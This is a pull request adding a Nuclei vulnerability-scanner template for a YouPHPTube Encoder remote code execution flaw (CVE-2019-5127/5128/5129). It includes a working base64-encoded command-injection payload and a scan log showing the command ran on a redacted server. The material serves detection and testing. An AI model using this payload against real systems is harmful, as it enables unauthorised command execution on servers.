### PR TITLE
Added (CVE-2019-5127) YouPHPTube Encoder RCE

### DIFF
--- a/cves/2019/CVE-2019-5127.yaml
+++ b/cves/2019/CVE-2019-5127.yaml
@@ -11,7 +11,7 @@ requests:
     path:
       - "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png"  #CVE-2019-5127
       - "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
-      - "{{BaseURL}}objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg"  #CVE-2019-5129
+      - "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg"  #CVE-2019-5129
     headers:
       Content-Type: application/x-www-form-urlencoded
   - method: GET

--- a/cves/2019/CVE-2019-5127.yaml
+++ b/cves/2019/CVE-2019-5127.yaml
@@ -1,0 +1,32 @@
+id: CVE-2019-5127
+
+info:
+  name: YouPHPTube Encoder RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png"  #CVE-2019-5127
+      - "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
+      - "{{BaseURL}}objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg"  #CVE-2019-5129
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+  - method: GET
+    path:
+      - "{{BaseURL}}/objects/nuclei.txt"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "uid(.*)"
+        part: body
+        condition: and
+      - type: status
+        status:
+          - 200

--- a/cves/2019/CVE-2019-5127.yaml
+++ b/cves/2019/CVE-2019-5127.yaml
@@ -5,6 +5,7 @@ info:
   author: pikpikcu
   severity: critical
   reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
+  tags: cve,cve2019,rce
 
 requests:
   - method: GET
@@ -25,6 +26,7 @@ requests:
       - type: regex
         regex:
           - "uid(.*)"
+          - "gid(.*)"
         part: body
         condition: and
       - type: status


### PR DESCRIPTION
```

                       __     _
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ /
   / / / / /_/ / /__/ /  __/ /
  /_/ /_/\__,_/\___/_/\___/_/   v2.2.0

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Loading templates...
[INF] [CVE-2019-5127] YouPHPTube Encoder RCE (@pikpikcu) [critical]
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] Dumped HTTP request for https://REDACTED (CVE-2019-5127)

GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1
Host: REDACTED
Connection: close
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP request for https://REDACTED (CVE-2019-5127)

GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1
Host: REDACTED
Connection: close
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP response for https://REDACTED (CVE-2019-5127)

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: image/jpg
Date: Fri, 05 Feb 2021 05:48:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=1dkdvpggchf0dmmlj84dsnuqh6; expires=Sat, 06-Feb-2021 05:48:27 GMT; Max-Age=86400; path=/
Content-Length: 0


[INF] Dumped HTTP request for https://REDACTED (CVE-2019-5127)

GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1
Host: REDACTED
Connection: close
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP request for https://REDACTED (CVE-2019-5127)

GET /objects/nuclei.txt HTTP/1.1
Host: REDACTED
Connection: close
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

[INF] Dumped HTTP response for https://REDACTED (CVE-2019-5127)

HTTP/1.1 200 OK
Connection: close
Content-Length: 54
Accept-Ranges: bytes
Content-Type: text/plain
Date: Fri, 05 Feb 2021 05:48:37 GMT
Etag: "36-5ba905e848f60"
Last-Modified: Fri, 05 Feb 2021 05:48:27 GMT
Server: Apache/2.4.10 (Debian)

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[CVE-2019-5127] [http] [critical] https://REDACTED/objects/nuclei.txt

```